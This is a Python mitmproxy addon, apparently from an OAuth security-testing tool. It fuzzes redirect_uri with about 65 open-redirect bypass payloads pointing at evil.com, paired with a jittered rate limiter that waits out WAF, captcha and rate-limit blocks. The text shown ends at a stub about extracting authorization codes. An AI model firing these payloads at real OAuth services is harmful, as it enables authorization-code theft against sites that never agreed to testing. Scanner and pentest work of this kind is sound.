oauth-backend/addon/open_redirect_check.py
2025-07-13 14:28:11 +09:00

1290 lines
No EOL
52 KiB
Python
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

from mitmproxy import http
import aiohttp
import asyncio
import random
import time
from urllib.parse import urlparse, parse_qs, urlencode, urlunparse
from lib.report_vuln import report_vuln
class RedirectRateLimiter:
"""클라이언트 앱 Open Redirect 체크 전용 rate limiter"""
def __init__(self):
self.last_request = 0
self.request_count = 0
self.failure_count = 0
self.consecutive_failures = 0
self.blocked_until = 0
self.pattern_index = 0 # 현재 테스트 중인 패턴 번호
# 설정값 (전체 패턴 기준으로 최적화)
self.base_delay = 1.0 # 기본 1초 지연 (65개니까 빠르게)
self.failure_backoff = 0.5 # 실패시 0.5초씩 증가
self.max_delay = 5.0 # 최대 5초 지연
self.block_duration = 300 # 5분 차단
self.success_speedup = 0.8 # 성공시 속도 증가
def reset_for_new_target(self):
"""새로운 타겟을 위해 상태 리셋"""
self.last_request = 0
self.request_count = 0
self.failure_count = 0
self.consecutive_failures = 0
self.blocked_until = 0
self.pattern_index = 0
print("[RATE_LIMIT] 새로운 타겟을 위해 Rate Limiter 리셋됨")
async def wait_if_needed(self, pattern_name: str, target_url: str = "") -> bool:
"""속도 조절 및 차단 대기"""
current_time = time.time()
# 차단 중인지 확인
if current_time < self.blocked_until:
remaining = int(self.blocked_until - current_time)
# 차단 이유 판단
if remaining > 200: # 5분에 가까우면 강한 차단
print(f"\n🛡️ 타겟 사이트의 보안 메커니즘이 감지됨!")
block_reason = "Security Block"
elif remaining > 100: # 2-3분이면 일시적 문제
print(f"\n⚠️ 타겟 서버 일시적 문제!")
block_reason = "Server Issue"
else: # 짧으면 가벼운 제한
print(f"\n🔒 타겟 사이트 접근 제한!")
block_reason = "Access Limit"
print(f"{remaining}초 대기 후 {pattern_name} 패턴 퍼징 재개... (이유: {block_reason})")
# 카운트다운 (10초 단위)
for i in range(remaining, 0, -1):
if i % 10 == 0 or i <= 10:
minutes = i // 60
seconds = i % 60
time_str = f"{minutes}{seconds}" if minutes > 0 else f"{seconds}"
print(f"\r⏳ 퍼징 재개까지: {time_str} 남음", end="", flush=True)
await asyncio.sleep(1)
print(f"\n✅ 대기 완료! {pattern_name} 패턴 퍼징 재개...")
self.blocked_until = 0
# 일반적인 퍼징 속도 조절
delay = self._calculate_delay()
time_since_last = current_time - self.last_request
if time_since_last < delay:
wait_time = delay - time_since_last
if wait_time > 2:
print(f"[FUZZER] ⏳ {wait_time:.1f}초 대기 (패턴: {pattern_name})")
await asyncio.sleep(wait_time)
self.last_request = time.time()
self.request_count += 1
self.pattern_index += 1
# 진행률 표시
if self.pattern_index % 5 == 0:
print(f"[FUZZER] 📊 {self.pattern_index}/65 우회 패턴 테스트 완료 ({(self.pattern_index/65)*100:.1f}%)")
return True
def _calculate_delay(self) -> float:
"""적응형 지연 시간 계산"""
delay = self.base_delay
# 연속 실패에 따른 백오프
if self.consecutive_failures > 0:
backoff = min(self.consecutive_failures * self.failure_backoff, 3.0)
delay += backoff
# 전체 실패율에 따른 조정
if self.request_count > 5:
failure_rate = self.failure_count / self.request_count
if failure_rate > 0.3: # 실패율 30% 초과시
delay *= (1 + failure_rate)
# 최대값 제한
delay = min(delay, self.max_delay)
# 랜덤 지터 (±20%)
jitter = random.uniform(0.8, 1.2)
return delay * jitter
def record_success(self):
"""성공 기록"""
self.consecutive_failures = 0
# 성공시 약간 속도 증가 (학습 효과)
if self.base_delay > 0.5:
self.base_delay *= self.success_speedup
def record_failure(self, error_msg: str = ""):
"""실패 기록 및 차단 감지"""
self.failure_count += 1
self.consecutive_failures += 1
# 웹사이트 방어 메커니즘 감지 패턴들
rate_limit_patterns = [
'429', # Too Many Requests
'rate limit', 'rate-limit', 'ratelimit',
'too many requests', 'request limit',
'throttled', 'throttling'
]
# 웹방화벽/보안 솔루션 차단 패턴들
security_block_patterns = [
'cloudflare', 'security check',
'access denied', 'forbidden',
'blocked', 'banned', 'suspended',
'captcha', 'recaptcha',
'bot detected', 'suspicious activity'
]
# 일시적 서버 문제
temporary_patterns = [
'503', 'service unavailable',
'server overloaded', 'temporarily unavailable',
'maintenance', 'under maintenance'
]
error_lower = str(error_msg).lower()
# 1. Rate Limit 감지
if any(pattern in error_lower for pattern in rate_limit_patterns):
self.blocked_until = time.time() + self.block_duration
print(f"[RATE_LIMIT] 🚫 웹사이트 Rate Limit 감지 - {self.block_duration}초 대기 예정")
print(f"[INFO] 💡 타겟 사이트가 요청 빈도를 제한하고 있습니다: {error_msg}")
return
# 2. 보안 솔루션 차단
elif any(pattern in error_lower for pattern in security_block_patterns):
self.blocked_until = time.time() + self.block_duration
print(f"[SECURITY_BLOCK] 🛡️ 웹방화벽/보안 솔루션 차단 - {self.block_duration}초 대기 예정")
print(f"[INFO] 💡 Cloudflare, WAF 등이 요청을 차단했습니다: {error_msg}")
return
# 3. 일시적 서버 문제
elif any(pattern in error_lower for pattern in temporary_patterns):
short_wait = min(self.block_duration // 2, 150)
self.blocked_until = time.time() + short_wait
print(f"[SERVER_ISSUE] ⚠️ 서버 일시적 문제 - {short_wait}초 대기")
print(f"[INFO] 💡 타겟 서버에 일시적 문제가 있습니다: {error_msg}")
return
# 4. 일반적인 HTTP 에러는 차단하지 않음
else:
client_errors = ['400', '401', '404', 'bad request', 'unauthorized', 'not found']
if any(code in error_lower for code in client_errors):
print(f"[HTTP_ERROR] ⚠️ HTTP 클라이언트 에러 (퍼징 계속): {error_msg}")
return
# 403만 특별 처리 (웹방화벽일 가능성)
if '403' in error_lower:
short_wait = 60
self.blocked_until = time.time() + short_wait
print(f"[ACCESS_DENIED] 🔒 접근 거부 - {short_wait}초 대기")
print(f"[INFO] 💡 타겟 사이트가 접근을 거부했습니다: {error_msg}")
return
# 5. 연속 실패 임계값
if self.consecutive_failures >= 15:
short_wait = 120
self.blocked_until = time.time() + short_wait
print(f"[FUZZER_PAUSE] ⏸️ 연속 실패 {self.consecutive_failures}회 - {short_wait}초 대기")
print(f"[INFO] 💡 타겟 사이트가 모든 우회 패턴을 차단하고 있을 수 있습니다.")
# 글로벌 레이트 리미터
redirect_limiter = RedirectRateLimiter()
class BypassPayload:
""" 우회 패턴 정의 """
def __init__(self, name: str, mutate_func, description: str):
self.name = name
self.mutate = mutate_func #우회 url 만드는 함수
self.description = description
class OpenRedirectChecker:
def __init__(self):
self.testing_targets = set() # 현재 테스트 중인 타겟들
""" 우회 페이로드 목록 """
self.bypass_payloads = [
BypassPayload(
name=r"@",
mutate_func=self._mutate_pattern1,
description=r"Host bypass attack using @ symbol: evil.com@target.com"
),
BypassPayload(
name=r"%ff@",
mutate_func=self._mutate_pattern2,
description=r"Hostname parsing bypass using Unicode %ff byte: evil%ff@target.com"
),
BypassPayload(
name=r"%ff_subdomain",
mutate_func=self._mutate_pattern3,
description=r"Unicode %ff byte injection in subdomain: evil%ff.target.com"
),
BypassPayload(
name=r"fullwidth_slash_direct",
mutate_func=self._mutate_pattern4_1,
description=r"Direct fullwidth slash bypass: target.com@evil.com"
),
BypassPayload(
name=r"fullwidth_slash_encoded",
mutate_func=self._mutate_pattern4_2,
description=r"Encoded fullwidth slash bypass: target.com%EF%BC%8F@evil.com"
),
BypassPayload(
name=r"fullwidth_backslash_direct",
mutate_func=self._mutate_pattern4_3,
description=r"Direct fullwidth backslash bypass: target.com@evil.com"
),
BypassPayload(
name=r"fullwidth_backslash_encoded",
mutate_func=self._mutate_pattern4_4,
description=r"Encoded fullwidth backslash bypass: target.com%EF%BC%BC@evil.com"
),
BypassPayload(
name=r"mixed_backslash_types",
mutate_func=self._mutate_pattern5,
description=r"Mixed backslash types: target.com\\evil.com"
),
BypassPayload(
name=r"mixed_backslash_fullwidth_slash",
mutate_func=self._mutate_pattern6,
description=r"Mixed backslash and fullwidth slash: target.com\\evil.com"
),
BypassPayload(
name=r"path_traversal_basic",
mutate_func=self._mutate_pattern7_1,
description=r"Basic path traversal: target.com/path/../../../evil.com"
),
BypassPayload(
name=r"path_traversal_deep",
mutate_func=self._mutate_pattern7_2,
description=r"Deep path traversal: target.com/path/../../../../../../../../evil.com"
),
BypassPayload(
name=r"path_traversal_absolute",
mutate_func=self._mutate_pattern7_3,
description=r"Absolute path traversal: target.com/../evil.com"
),
BypassPayload(
name=r"path_traversal_mixed",
mutate_func=self._mutate_pattern7_4,
description=r"Mixed slash traversal: target.com/path/.././.././evil.com"
),
BypassPayload(
name=r"path_traversal_semicolon",
mutate_func=self._mutate_pattern7_5,
description=r"Semicolon path traversal: target.com/path/..;/..;/evil.com"
),
BypassPayload(
name=r"path_traversal_encoded",
mutate_func=self._mutate_pattern7_6,
description=r"URL encoded traversal: target.com/path/%2e%2e/%2e%2e/evil.com"
),
BypassPayload(
name=r"path_traversal_double_encoded",
mutate_func=self._mutate_pattern7_7,
description=r"Double encoded traversal: target.com/path/%252e%252e%252f/evil.com"
),
BypassPayload(
name=r"path_traversal_hex",
mutate_func=self._mutate_pattern7_8,
description=r"Hex encoded traversal: target.com/path/%2e%2e%2f%2e%2e%2f/evil.com"
),
BypassPayload(
name=r"path_traversal_unicode",
mutate_func=self._mutate_pattern7_9,
description=r"Unicode dot traversal: target.com/path///evil.com"
),
BypassPayload(
name=r"path_traversal_backslash",
mutate_func=self._mutate_pattern7_10,
description=r"Backslash traversal: target.com/path\\..\\..\\evil.com"
),
BypassPayload(
name=r"path_traversal_overlong",
mutate_func=self._mutate_pattern7_11,
description=r"Overlong UTF-8 traversal: target.com/path/%c0%ae%c0%ae/evil.com"
),
BypassPayload(
name=r"path_traversal_null",
mutate_func=self._mutate_pattern7_12,
description=r"Null byte traversal: target.com/path/../%00../evil.com"
),
BypassPayload(
name=r"wildcard_subdomain_bypass",
mutate_func=self._mutate_pattern8,
description=r"Wildcard subdomain bypass: attacker.target.com"
),
BypassPayload(
name=r"backslash_bypass",
mutate_func=self._mutate_pattern9,
description=r"Backslash URL parsing bypass: target.com\\evil.com"
),
BypassPayload(
name=r"double_slash",
mutate_func=self._mutate_pattern10,
description=r"Double slash bypass: target.com//evil.com"
),
BypassPayload(
name=r"question_mark",
mutate_func=self._mutate_pattern11,
description=r"Question mark bypass: target.com?evil.com"
),
BypassPayload(
name=r"idn_homograph",
mutate_func=self._mutate_pattern12,
description=r"IDN homograph attack using visually similar characters: gооgle.com (Cyrillic)"
),
BypassPayload(
name=r"ipv6_bypass",
mutate_func=self._mutate_pattern13,
description=r"IPv6 address bypass: evil.com@[::1] or evil.com@[2001:db8::1]"
),
BypassPayload(
name=r"mixed_case_idn_combo",
mutate_func=self._mutate_pattern14,
description=r"Mixed case + IDN combo: ЕVIL.example@TARGET.COM"
),
BypassPayload(
name=r"fragment_bypass",
mutate_func=self._mutate_pattern15,
description=r"Fragment identifier bypass: target.com#@evil.com"
),
BypassPayload(
name=r"combined_bypass",
mutate_func=self._mutate_pattern16,
description=r"Combined multiple bypass techniques: evil.com@target.com//../../evil.com"
),
BypassPayload(
name=r"path_backslash_domain",
mutate_func=self._mutate_pattern17,
description=r"Path backslash domain bypass: target.com\\.evil.com"
),
BypassPayload(
name=r"mixed_encoding_chaos_basic",
mutate_func=self._mutate_pattern18_1,
description=r"Basic mixed encoding: evil.com%09%0A%20@target.com"
),
BypassPayload(
name=r"mixed_encoding_chaos_full",
mutate_func=self._mutate_pattern18_2,
description=r"Full control char chaos: evil.com%0A%0D%09%0B%0C%20@target.com"
),
BypassPayload(
name=r"mixed_encoding_chaos_special",
mutate_func=self._mutate_pattern18_3,
description=r"Control + special chars: evil.com%09%0A%20%00%FF@target.com"
),
BypassPayload(
name=r"mixed_encoding_chaos_double",
mutate_func=self._mutate_pattern18_4,
description=r"Double encoded chaos: evil.com%2509%250A%2520@target.com"
),
BypassPayload(
name=r"mixed_encoding_chaos_reverse",
mutate_func=self._mutate_pattern18_5,
description=r"Reverse control chars: evil.com%20%0A%09@target.com"
),
BypassPayload(
name=r"mixed_encoding_chaos_repeat",
mutate_func=self._mutate_pattern18_6,
description=r"Repeated control chars: evil.com%09%09%09@target.com"
),
BypassPayload(
name=r"subdomain_confusion_hyphen",
mutate_func=self._mutate_pattern19,
description=r"Subdomain confusion with hyphen: target-com.evil.com"
),
BypassPayload(
name=r"semicolon_userinfo_bypass",
mutate_func=self._mutate_pattern20,
description=r"Semicolon userinfo bypass: target.com;evil.com"
),
BypassPayload(
name=r"tab_character_bypass",
mutate_func=self._mutate_pattern21,
description=r"Tab character bypass using %09: evil.com%09@target.com"
),
BypassPayload(
name=r"space_character_bypass",
mutate_func=self._mutate_pattern22,
description=r"Space character bypass using %20: evil.com%20@target.com"
),
BypassPayload(
name=r"form_feed_bypass",
mutate_func=self._mutate_pattern23,
description=r"Form feed character bypass using %0c: evil.com%0c@target.com"
),
BypassPayload(
name=r"vertical_tab_bypass",
mutate_func=self._mutate_pattern24,
description=r"Vertical tab bypass using %0b: evil.com%0b@target.com"
),
BypassPayload(
name=r"%0a@",
mutate_func=self._mutate_pattern25,
description=r"Newline character bypass using %0a@: evil.com%0a@target.com"
),
BypassPayload(
name=r"%0d@",
mutate_func=self._mutate_pattern26,
description=r"Carriage return bypass using %0d@: evil.com%0d@target.com (URL parser confusion)"
),
BypassPayload(
name=r"crlf_injection",
mutate_func=self._mutate_pattern27,
description=r"CRLF injection bypass: evil.com%0D%0A@target.com"
),
BypassPayload(
name=r"mixed_case_scheme",
mutate_func=self._mutate_pattern28,
description=r"Mixed case scheme bypass: HtTpS://evil.com@target.com"
),
BypassPayload(
name=r"scheme_dot_injection",
mutate_func=self._mutate_pattern29,
description=r"Scheme dot injection: https.://evil.com@target.com"
),
BypassPayload(
name=r"port_encoded_bypass",
mutate_func=self._mutate_pattern30,
description=r"Port encoded bypass: target.com:%40evil.com (%40 = @)"
),
BypassPayload(
name=r"ampersand_encoded_bypass",
mutate_func=self._mutate_pattern31,
description=r"Ampersand encoded bypass: target.com &%40evil.com"
),
BypassPayload(
name=r"underscore_encoded_bypass",
mutate_func=self._mutate_pattern32,
description=r"Underscore encoded bypass: target.com.%5F.evil.com (%5F = _)"
),
BypassPayload(
name=r"comma_separator_bypass",
mutate_func=self._mutate_pattern33,
description=r"Comma separator bypass: target.com.%2C.evil.com (%2C = ,)"
),
BypassPayload(
name=r"schemeless_bypass",
mutate_func=self._mutate_pattern34,
description=r"Schemeless bypass: //evil.com"
),
BypassPayload(
name=r"schema_colon_bypass",
mutate_func=self._mutate_pattern35,
description=r"Schema colon bypass: http:evil.com"
),
BypassPayload(
name=r"null_byte_prefix",
mutate_func=self._mutate_pattern36,
description=r"Null byte prefix: %00http://evil.com"
),
BypassPayload(
name=r"unicode_spaces_bypass",
mutate_func=self._mutate_pattern37,
description=r"Unicode spaces bypass: evil.com%E2%80%8Btarget.com (zero-width space)"
),
BypassPayload(
name=r"bracket_encoded_bypass",
mutate_func=self._mutate_pattern38,
description=r"Bracket encoded bypass: target.com%5B%40evil.com (%5B = [)"
),
BypassPayload(
name=r"protocol_omit_backslash",
mutate_func=self._mutate_pattern39,
description=r"Protocol omit with backslash: \\\\evil.com\\target.com"
),
BypassPayload(
name=r"query_internal_bypass",
mutate_func=self._mutate_pattern40,
description=r"Internal query bypass: target.com?url=target.com&redirect=evil.com"
),
BypassPayload(
name=r"anchor_at_combo",
mutate_func=self._mutate_pattern41,
description=r"Anchor + @ combo: target.com#evil.com@target.com"
),
BypassPayload(
name=r"emoji_domain_bypass",
mutate_func=self._mutate_pattern42,
description=r"Emoji domain bypass: https://😈.evil.com"
),
BypassPayload(
name=r"punycode_idn_bypass",
mutate_func=self._mutate_pattern43,
description=r"Punycode IDN bypass: https://xn--e1afmkfd.xn--p1ai"
),
BypassPayload(
name=r"backtick_at_combo",
mutate_func=self._mutate_pattern44,
description=r"Backtick @ combo: evil.com`@target.com"
),
BypassPayload(
name=r"complex_encoding_mix",
mutate_func=self._mutate_pattern45,
description=r"Complex encoding mix: evil%2Ecom%09%0A%FF@target.com"
),
BypassPayload(
name=r"question_backslash_combo",
mutate_func=self._mutate_pattern46,
description=r"Question backslash combo: target.com?\\evil.com"
),
]
self.session = None
""" 우회 URL 생성 목록 """
# 1. @
def _mutate_pattern1(self, original: str) -> str:
return f"https://evil.com@{original}"
# 2. %ff@ - 유니코드 바이트 우회
def _mutate_pattern2(self, original: str) -> str:
return f"https://evil%ff@{original}"
# 3. %ff 서브도메인 - 유니코드 바이트 서브도메인 삽입
def _mutate_pattern3(self, original: str) -> str:
parsed = urlparse(original)
path_part = parsed.path if parsed.path else ""
return f"https://evil%ff.{parsed.netloc}{path_part}"
# 4. 전각 문자 패턴 - , %EF%BC%8F, , %EF%BC%BC
# 4_1. 직접 전각 슬래시
def _mutate_pattern4_1(self, original: str) -> str:
return f"https://{original}@evil.com"
# 4_2. URL 인코딩된 전각 슬래시(%EF%BC%8F)
def _mutate_pattern4_2(self, original: str) -> str:
return f"https://{original}%EF%BC%8F@evil.com"
# 4_3. 직접 전각 백슬래시
def _mutate_pattern4_3(self, original: str) -> str:
return f"https://{original}@evil.com"
# 4_4. URL 인코딩된 전각 백슬래시(%EF%BC%BC)
def _mutate_pattern4_4(self, original: str) -> str:
return f"https://{original}%EF%BC%BC@evil.com"
# 5. 백슬래시 + 전각 백슬래시 조합
def _mutate_pattern5(self, original: str) -> str:
return f"https://{original}\\evil.com"
# 6. 백슬래시 + 전각 슬래시
def _mutate_pattern6(self, original: str) -> str:
return f"https://{original}\\evil.com"
# 7. 경로 순회 - Path traversal bypass
# 7-1. 기본 경로 순회
def _mutate_pattern7_1(self, original: str) -> str:
parsed = urlparse(original)
base_path = parsed.path if parsed.path else "/callback"
return f"https://{parsed.netloc}{base_path}/../../../evil.com"
# 7-2. 더 많은 경로 순회
def _mutate_pattern7_2(self, original: str) -> str:
parsed = urlparse(original)
base_path = parsed.path if parsed.path else "/callback"
return f"https://{parsed.netloc}{base_path}/../../../../../../../../evil.com"
# 7-3. 절대 경로로 우회
def _mutate_pattern7_3(self, original: str) -> str:
parsed = urlparse(original)
return f"https://{parsed.netloc}/../evil.com"
# 7-4. 혼합 슬래시 패턴
def _mutate_pattern7_4(self, original: str) -> str:
parsed = urlparse(original)
base_path = parsed.path if parsed.path else "/callback"
return f"https://{parsed.netloc}{base_path}/.././.././evil.com"
# 7-5. 점 뒤에 추가 문자
def _mutate_pattern7_5(self, original: str) -> str:
parsed = urlparse(original)
base_path = parsed.path if parsed.path else "/callback"
return f"https://{parsed.netloc}{base_path}/..;/..;/evil.com"
# 7-6. URL 인코딩된 경로 순회
def _mutate_pattern7_6(self, original: str) -> str:
parsed = urlparse(original)
base_path = parsed.path if parsed.path else "/callback"
# %2e = ., %2f = /
return f"https://{parsed.netloc}{base_path}/%2e%2e/%2e%2e/%2e%2e/evil.com"
# 7-7. 이중 URL 인코딩
def _mutate_pattern7_7(self, original: str) -> str:
parsed = urlparse(original)
base_path = parsed.path if parsed.path else "/callback"
# %252e = 이중 인코딩된 .
return f"https://{parsed.netloc}{base_path}/%252e%252e%252f%252e%252e%252fevil.com"
# 7-8. 16진수 인코딩
def _mutate_pattern7_8(self, original: str) -> str:
parsed = urlparse(original)
base_path = parsed.path if parsed.path else "/callback"
# 0x2e2e2f = ../
return f"https://{parsed.netloc}{base_path}/%2e%2e%2f%2e%2e%2f%2e%2e%2fevil.com"
# 7-9. 유니코드 정규화 우회
def _mutate_pattern7_9(self, original: str) -> str:
parsed = urlparse(original)
base_path = parsed.path if parsed.path else "/callback"
# 유니코드 점 문자들 (U+002E, U+FF0E 등)
return f"https://{parsed.netloc}{base_path}///evil.com"
# 7-10. 백슬래시 + 경로 순회 조합
def _mutate_pattern7_10(self, original: str) -> str:
parsed = urlparse(original)
base_path = parsed.path if parsed.path else "/callback"
return f"https://{parsed.netloc}{base_path}\\..\\..\\evil.com"
# 7-11. 오버롱 UTF-8 인코딩
def _mutate_pattern7_11(self, original: str) -> str:
parsed = urlparse(original)
base_path = parsed.path if parsed.path else "/callback"
# %c0%ae = 오버롱 UTF-8로 인코딩된 점
return f"https://{parsed.netloc}{base_path}/%c0%ae%c0%ae/%c0%ae%c0%ae/evil.com"
# 7-12. 널 바이트 삽입
def _mutate_pattern7_12(self, original: str) -> str:
parsed = urlparse(original)
base_path = parsed.path if parsed.path else "/callback"
# %00 = 널 바이트
return f"https://{parsed.netloc}{base_path}/../%00../../../evil.com"
# 8. 와일드카드 서브도메인 우회
def _mutate_pattern8(self, original: str) -> str:
parsed = urlparse(original)
path_part = parsed.path if parsed.path else ""
# 공격자가 제어하는 서브도메인으로 *.target.com 정책 우회
return f"https://attacker.{parsed.netloc}{path_part}"
# 9. 백슬래시 우회 - Dart SDK Issue #50075
def _mutate_pattern9(self, original: str) -> str:
return f"https://{original}\\evil.com"
# 10. 이중 슬래시
def _mutate_pattern10(self, original: str) -> str:
return f"https://{original}//evil.com"
# 11. 물음표 우회
def _mutate_pattern11(self, original: str) -> str:
return f"https://{original}?evil.com"
# 12. IDN 동형문자 공격 - 시각적으로 동일하지만 다른 도메인
def _mutate_pattern12(self, original: str) -> str:
# RFC 2606 테스트 도메인 + IDN 문자 о(키릴 문자 U+043E) vs o(라틴 문자 U+006F) 사용
return f"https://еvil.example@{original}"
# 13. IPv6 주소 우회 - 안전한 버전
def _mutate_pattern13(self, original: str) -> str:
parsed = urlparse(original)
path_part = parsed.path if parsed.path else ""
# 안전한 IPv6 @ 우회 패턴
if "localhost" in parsed.netloc:
mutated = f"https://evil.example@[::1]:3000{path_part}"
else:
# RFC 3849 문서용 IPv6 주소 사용 (라우팅 안 됨)
mutated = f"https://evil.example@[2001:db8::1]{path_part}"
return mutated
# 14. 대소문자 + IDN 문자 조합으로 필터 우회
def _mutate_pattern14(self, original: str) -> str:
return f"https://ЕVIL.example@{original}" # Е는 키릴 문자
# 15. Fragment identifier 우회
def _mutate_pattern15(self, original: str) -> str:
# Fragment(#)로 실제 목적지 숨기기 - 브라우저는 fragment 부분을 서버에 전송하지 않음
return f"https://{original}#@evil.com"
# 16. 복합 우회 패턴 - 여러 기법 동시 적용
def _mutate_pattern16(self, original: str) -> str:
# @ 우회 + 이중 슬래시 + 경로 순회 조합
return f"https://evil.com@{original}//../../evil.com"
# 17. 경로에 백슬래시 + 도메인 우회 (Chrome, Firefox, Edge)
def _mutate_pattern17(self, original: str) -> str:
# target.com\\.evil.com 패턴 - 기존 백슬래시 패턴과는 다른 위치
return f"https://{original}\\.evil.com"
# 18_1. 혼합 인코딩 우회 (여러 인코딩 방식 조합)
def _mutate_pattern18_1(self, original: str) -> str:
# 탭 + 줄바꿈 + 공백
return f"https://evil.com%09%0A%20@{original}"
# 18_2. 모든 제어 문자 조합
def _mutate_pattern18_2(self, original: str) -> str:
# 줄바꿈 + 캐리지리턴 + 탭 + 수직탭 + 폼피드 + 공백
return f"https://evil.com%0A%0D%09%0B%0C%20@{original}"
# 18_3. 제어 문자 + 특수 문자
def _mutate_pattern18_3(self, original: str) -> str:
return f"https://evil.com%09%0A%20%00%FF@{original}"
# 18_4. 이중 인코딩 + 제어 문자
def _mutate_pattern18_4(self, original: str) -> str:
return f"https://evil.com%2509%250A%2520@{original}"
# 18_5. 역순 제어 문자
def _mutate_pattern18_5(self, original: str) -> str:
return f"https://evil.com%20%0A%09@{original}"
# 18_6. 반복 제어 문자
def _mutate_pattern18_6(self, original: str) -> str:
return f"https://evil.com%09%09%09@{original}"
# 19. 서브도메인 혼동 우회 (하이픈 버전)
def _mutate_pattern19(self, original: str) -> str:
parsed = urlparse(original)
path_part = parsed.path if parsed.path else ""
# target.com → target-com.evil.com
host_with_hyphen = parsed.netloc.replace('.', '-').replace(':', '-')
return f"https://{host_with_hyphen}.evil.com{path_part}"
# 20. 세미콜론 userinfo 우회
def _mutate_pattern20(self, original: str) -> str:
return f"https://{original};evil.com"
# 21. %09 - 탭 문자 우회
def _mutate_pattern21(self, original: str) -> str:
return f"https://evil.com%09@{original}"
# 22. %20 - 공백 문자 우회
def _mutate_pattern22(self, original: str) -> str:
return f"https://evil.com%20@{original}"
# 23. %0c - 폼 피드 문자 우회
def _mutate_pattern23(self, original: str) -> str:
return f"https://evil.com%0c@{original}"
# 24. %0b - 수직 탭 문자 우회
def _mutate_pattern24(self, original: str) -> str:
return f"https://evil.com%0b@{original}"
# 25. %0a@ - 줄바꿈 문자 우회
def _mutate_pattern25(self, original: str) -> str:
return f"https://evil.com%0a@{original}"
# 26. %0d@ - 캐리지 리턴 우회 (URL parser confusion)
def _mutate_pattern26(self, original: str) -> str:
return f"https://evil.com%0d@{original}"
# 27. CRLF 인젝션 우회
def _mutate_pattern27(self, original: str) -> str:
# %0D%0A = CRLF (Carriage Return + Line Feed) - HTTP 헤더 인젝션
return f"https://evil.com%0D%0A@{original}"
# 28. HTTP/HTTPS 대소문자 혼합 스키마 우회
def _mutate_pattern28(self, original: str) -> str:
return f"HtTpS://evil.com@{original}"
# 29. 점(.) 문자 우회 - 스키마와 호스트 사이에 점 삽입 (표준 위반 = 취약점)
def _mutate_pattern29(self, original: str) -> str:
return f"https.://evil.com@{original}"
# 30. 포트 인코딩 우회 - %40 = @
def _mutate_pattern30(self, original: str) -> str:
return f"https://{original}:%40evil.com"
# 31. 앰퍼샌드 인코딩 우회 - URL 파싱 혼동
def _mutate_pattern31(self, original: str) -> str:
return f"https://{original} &%40evil.com"
# 32. 언더스코어 인코딩 우회 - 도메인 분리자로 오인
def _mutate_pattern32(self, original: str) -> str:
parsed = urlparse(original)
path_part = parsed.path if parsed.path else ""
return f"https://{parsed.netloc}.%5F.evil.com{path_part}"
# 33. 콤마 분리자 우회 - 일부 파서에서 분리자로 인식
def _mutate_pattern33(self, original: str) -> str:
parsed = urlparse(original)
path_part = parsed.path if parsed.path else ""
return f"https://{parsed.netloc}.%2C.evil.com{path_part}"
# 34. 스키마 없는 우회
def _mutate_pattern34(self, original: str) -> str:
return f"//evil.com/{original}"
# 35. 스키마 콜론 우회 - RFC 위반 파싱
def _mutate_pattern35(self, original: str) -> str:
return f"http:evil.com/{original}"
# 36. 널 바이트 prefix - 파싱 혼동
def _mutate_pattern36(self, original: str) -> str:
return f"%00https://evil.com/{original}"
# 37. 유니코드 공백 문자 - %E2%80%8B = zero-width space
def _mutate_pattern37(self, original: str) -> str:
return f"https://evil.com%E2%80%8B@{original}"
# 38. 대괄호 인코딩 우회
def _mutate_pattern38(self, original: str) -> str:
return f"https://{original}%5B%40evil.com"
# 39. 프로토콜 생략 + 백슬래시
def _mutate_pattern39(self, original: str) -> str:
parsed = urlparse(original)
return f"\\\\evil.com\\{parsed.netloc}"
# 40. 쿼리 파라미터 내부 우회
def _mutate_pattern40(self, original: str) -> str:
parsed = urlparse(original)
return f"https://{parsed.netloc}?url={parsed.netloc}&redirect=evil.com"
# 41. 앵커 태그 + @ 조합
def _mutate_pattern41(self, original: str) -> str:
parsed = urlparse(original)
return f"https://{parsed.netloc}#evil.com@{parsed.netloc}"
# 42. 이모티콘 도메인
def _mutate_pattern42(self, original: str) -> str:
return f"https://😈.evil.com"
# 43. Punycode IDN 우회 (러시아어 evil.ru)
def _mutate_pattern43(self, original: str) -> str:
return f"https://xn--e1afmkfd.xn--p1ai" # evil в 러시아어
# 44. 백틱 + @ 조합
def _mutate_pattern44(self, original: str) -> str:
return f"https://evil.com`@{original}"
# 45. 복잡한 인코딩 혼합
def _mutate_pattern45(self, original: str) -> str:
return f"https://evil%2Ecom%09%0A%FF@{original}"
# 46. 물음표 + 백슬래시 조합
def _mutate_pattern46(self, original: str) -> str:
return f"https://{original}?\\evil.com"
'''aiohttp 세션 생성 (재사용)'''
async def _get_session(self):
if self.session is None:
timeout = aiohttp.ClientTimeout(total=10)
self.session = aiohttp.ClientSession(timeout=timeout)
return self.session
'''세션 정리'''
async def close_session(self):
if self.session:
await self.session.close()
self.session = None
""" 우회된 URL에 GET 요청을 보내고, 서버 응답 정보 반환 """
async def _send_request(self, url, headers=None):
try:
session = await self._get_session() # 세션 준비
request_headers = headers or {} # 요청 헤더 설정 - headers가 주어지지 않았다면 빈 딕셔너리 사용
# 서버에 GET 요청 전송 (allow_redirects=False로 리다이렉트 추적)
async with session.get(url, allow_redirects=False, headers=request_headers) as response:
result = {
'status': response.status,
'location': response.headers.get("Location", ""),
'headers': dict(response.headers)
}
# 성공/실패 기록 (rate limiter용)
if response.status in [200, 301, 302, 303, 307, 308]:
redirect_limiter.record_success()
else:
redirect_limiter.record_failure(f"HTTP {response.status}")
return result
except Exception as e:
redirect_limiter.record_failure(str(e))
print(f"[ERROR] 요청 실패 ({url}): {e}")
return {'status': 500, 'location': '', 'headers': {}}
""" redirect_uri가 악성 패턴을 포함하는지 빠르게 검사 """
def _is_baseline_valid(self, redirect_uri: str, base_url: str) -> bool:
try:
base_parsed = urlparse(base_url)
base_host = base_parsed.hostname
if not base_host:
return False
# 악성 패턴 빠른 검사 (로그 없이)
malicious_patterns = [
"еvil.example", "[::1]", "[2001:db8", "#@", "%ff",
"", "", "%EF%BC%8F", "%EF%BC%BC", "evil.com"
]
for pattern in malicious_patterns:
if pattern in redirect_uri:
return False
# @ 기반 우회 패턴 검사
if "@" in redirect_uri:
at_parts = redirect_uri.split('@')
if len(at_parts) >= 2:
before_at = at_parts[0]
if '//' in before_at:
potential_domain = before_at.split('//')[-1]
if '.' in potential_domain and potential_domain != base_host:
return False
# 일반 도메인 검증
if "@" not in redirect_uri:
redirect_parsed = urlparse(redirect_uri)
redirect_host = redirect_parsed.hostname
if redirect_host:
return (redirect_host == base_host or redirect_host.endswith(f".{base_host}"))
return True
except Exception:
return False
""" Location 헤더에서 authorization code 추출 """
